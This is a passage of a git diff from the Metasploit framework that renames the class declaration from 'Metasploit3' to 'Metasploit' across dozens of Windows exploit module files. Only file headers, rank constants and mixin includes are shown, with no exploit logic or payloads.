Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb index 18d24e0ecc..9856d47176 100644 --- a/modules/exploits/windows/misc/wireshark_packet_dect.rb +++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Capture diff --git a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb index c20731b6f7..8dbb94d566 100644 --- a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb +++ b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb index 178db155a1..fe0035d7a5 100644 --- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb +++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb index a4bb8bffe2..c84d810143 100644 --- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb +++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms02_039_slammer.rb b/modules/exploits/windows/mssql/ms02_039_slammer.rb index bebd9c7c2d..e251c3f7e2 100644 --- a/modules/exploits/windows/mssql/ms02_039_slammer.rb +++ b/modules/exploits/windows/mssql/ms02_039_slammer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms02_056_hello.rb b/modules/exploits/windows/mssql/ms02_056_hello.rb index 91180f3205..f1b0694ec8 100644 --- a/modules/exploits/windows/mssql/ms02_056_hello.rb +++ b/modules/exploits/windows/mssql/ms02_056_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index fa9004658b..de2d68ea15 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 320da58665..f60aabbb1b 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index e9bc7580e0..170ae3130f 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index d5ebe45d04..9d8c392625 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb index 4ab1c8beb6..0973e3334e 100644 --- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb +++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/exploits/windows/mysql/mysql_mof.rb b/modules/exploits/windows/mysql/mysql_mof.rb index 9c292c9619..d45b730d7f 100644 --- a/modules/exploits/windows/mysql/mysql_mof.rb +++ b/modules/exploits/windows/mysql/mysql_mof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/mysql/mysql_payload.rb b/modules/exploits/windows/mysql/mysql_payload.rb index 46db38c85c..412b25abd3 100644 --- a/modules/exploits/windows/mysql/mysql_payload.rb +++ b/modules/exploits/windows/mysql/mysql_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/mysql/mysql_start_up.rb b/modules/exploits/windows/mysql/mysql_start_up.rb index 5628daeca3..52b2513c03 100644 --- a/modules/exploits/windows/mysql/mysql_start_up.rb +++ b/modules/exploits/windows/mysql/mysql_start_up.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/mysql/mysql_yassl_hello.rb b/modules/exploits/windows/mysql/mysql_yassl_hello.rb index 8117dfec8f..2f7ac3cd77 100644 --- a/modules/exploits/windows/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/windows/mysql/mysql_yassl_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index 44eb354357..586024d02a 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/nfs/xlink_nfsd.rb b/modules/exploits/windows/nfs/xlink_nfsd.rb index 0811a8ec5c..3eeb7b6854 100644 --- a/modules/exploits/windows/nfs/xlink_nfsd.rb +++ b/modules/exploits/windows/nfs/xlink_nfsd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/nntp/ms05_030_nntp.rb b/modules/exploits/windows/nntp/ms05_030_nntp.rb index d1e2bd80c7..ec4670286f 100644 --- a/modules/exploits/windows/nntp/ms05_030_nntp.rb +++ b/modules/exploits/windows/nntp/ms05_030_nntp.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb index 79b9157845..8a868b2ff9 100644 --- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb +++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/novell/groupwisemessenger_client.rb b/modules/exploits/windows/novell/groupwisemessenger_client.rb index 212d81188d..b656afec9e 100644 --- a/modules/exploits/windows/novell/groupwisemessenger_client.rb +++ b/modules/exploits/windows/novell/groupwisemessenger_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/novell/netiq_pum_eval.rb b/modules/exploits/windows/novell/netiq_pum_eval.rb index b437751a1a..40ef9bbd07 100644 --- a/modules/exploits/windows/novell/netiq_pum_eval.rb +++ b/modules/exploits/windows/novell/netiq_pum_eval.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/novell/nmap_stor.rb b/modules/exploits/windows/novell/nmap_stor.rb index 36575b89bd..88070f4bd5 100644 --- a/modules/exploits/windows/novell/nmap_stor.rb +++ b/modules/exploits/windows/novell/nmap_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index 8899a87ccf..7965f0433b 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb index 08817cddeb..6f25c77cfe 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb index 911d0683cf..0d66fdadeb 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb index bbc14601ec..1bfaafbac7 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb index f4930191b4..2d741205d8 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb index b305977fbb..792ebb06c6 100644 --- a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb +++ b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Oracle Containers for J2EE/ ] } diff --git a/modules/exploits/windows/oracle/extjob.rb b/modules/exploits/windows/oracle/extjob.rb index 7af245692f..6335591d1d 100644 --- a/modules/exploits/windows/oracle/extjob.rb +++ b/modules/exploits/windows/oracle/extjob.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb index bd720f2aee..b7d57f7e22 100644 --- a/modules/exploits/windows/oracle/osb_ndmp_auth.rb +++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::NDMP diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 8d33b8642c..6813232f6e 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index 228927ad94..a4c703c209 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index 5dcf583fc3..2c9fb69544 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index 2cd1ccf651..9e7d7fd0fb 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb index 9fd971c9e6..48a95a69dd 100644 --- a/modules/exploits/windows/postgres/postgres_payload.rb +++ b/modules/exploits/windows/postgres/postgres_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres diff --git a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb index 623accfec0..0c8f0b8687 100644 --- a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb +++ b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] } diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index bae54e50bb..a29a9b7402 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index 7dc8d3caef..52c46f8b63 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index 25e75addc9..e75dee83e0 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/abb_wserver_exec.rb b/modules/exploits/windows/scada/abb_wserver_exec.rb index cdb7cdb0d7..352485f303 100644 --- a/modules/exploits/windows/scada/abb_wserver_exec.rb +++ b/modules/exploits/windows/scada/abb_wserver_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/citect_scada_odbc.rb b/modules/exploits/windows/scada/citect_scada_odbc.rb index 096e470c38..423aeba739 100644 --- a/modules/exploits/windows/scada/citect_scada_odbc.rb +++ b/modules/exploits/windows/scada/citect_scada_odbc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb index 709c87917f..3ee3ac4f58 100644 --- a/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb +++ b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/scada/codesys_web_server.rb b/modules/exploits/windows/scada/codesys_web_server.rb index 48a22d1afb..c734b4ca80 100644 --- a/modules/exploits/windows/scada/codesys_web_server.rb +++ b/modules/exploits/windows/scada/codesys_web_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb index bf791cc5d9..89440348ea 100644 --- a/modules/exploits/windows/scada/daq_factory_bof.rb +++ b/modules/exploits/windows/scada/daq_factory_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/scada/factorylink_csservice.rb b/modules/exploits/windows/scada/factorylink_csservice.rb index d9ccff31a2..f21ab94c68 100644 --- a/modules/exploits/windows/scada/factorylink_csservice.rb +++ b/modules/exploits/windows/scada/factorylink_csservice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/factorylink_vrn_09.rb b/modules/exploits/windows/scada/factorylink_vrn_09.rb index 01c93d561f..1fd77ba153 100644 --- a/modules/exploits/windows/scada/factorylink_vrn_09.rb +++ b/modules/exploits/windows/scada/factorylink_vrn_09.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb index 451686637c..48bcd00dfa 100644 --- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb +++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/windows/scada/iconics_genbroker.rb b/modules/exploits/windows/scada/iconics_genbroker.rb index 13b9ae70c8..d64df92fcd 100644 --- a/modules/exploits/windows/scada/iconics_genbroker.rb +++ b/modules/exploits/windows/scada/iconics_genbroker.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb index 76d3ba0e37..4971af67dd 100644 --- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb +++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb index 5e5d0fe856..20b39c2fa9 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb index aa2097f34f..59daf23440 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/igss9_misc.rb b/modules/exploits/windows/scada/igss9_misc.rb index 41ba050c1b..5a67728fa3 100644 --- a/modules/exploits/windows/scada/igss9_misc.rb +++ b/modules/exploits/windows/scada/igss9_misc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/igss_exec_17.rb b/modules/exploits/windows/scada/igss_exec_17.rb index ebd1fce53c..5bb5f73bfd 100644 --- a/modules/exploits/windows/scada/igss_exec_17.rb +++ b/modules/exploits/windows/scada/igss_exec_17.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb index 2c4fa65f6b..c3c0b3c6a3 100644 --- a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb +++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/moxa_mdmtool.rb b/modules/exploits/windows/scada/moxa_mdmtool.rb index 9ac1d96811..081ddc2c10 100644 --- a/modules/exploits/windows/scada/moxa_mdmtool.rb +++ b/modules/exploits/windows/scada/moxa_mdmtool.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/procyon_core_server.rb b/modules/exploits/windows/scada/procyon_core_server.rb index 0c27241964..4b4fb20d10 100644 --- a/modules/exploits/windows/scada/procyon_core_server.rb +++ b/modules/exploits/windows/scada/procyon_core_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/scada/realwin.rb b/modules/exploits/windows/scada/realwin.rb index bb08a5045c..1c6f0f453f 100644 --- a/modules/exploits/windows/scada/realwin.rb +++ b/modules/exploits/windows/scada/realwin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb index 49bdb98f4c..a515f062c3 100644 --- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb +++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_on_fcs_login.rb b/modules/exploits/windows/scada/realwin_on_fcs_login.rb index 3659a25bcb..8f2b64e89b 100644 --- a/modules/exploits/windows/scada/realwin_on_fcs_login.rb +++ b/modules/exploits/windows/scada/realwin_on_fcs_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize.rb b/modules/exploits/windows/scada/realwin_scpc_initialize.rb index 6639e8f9d1..dbc636e3f1 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb index ae8957925b..a454ad7c26 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb index 1ea64e355b..ec76d4e654 100644 --- a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb +++ b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git 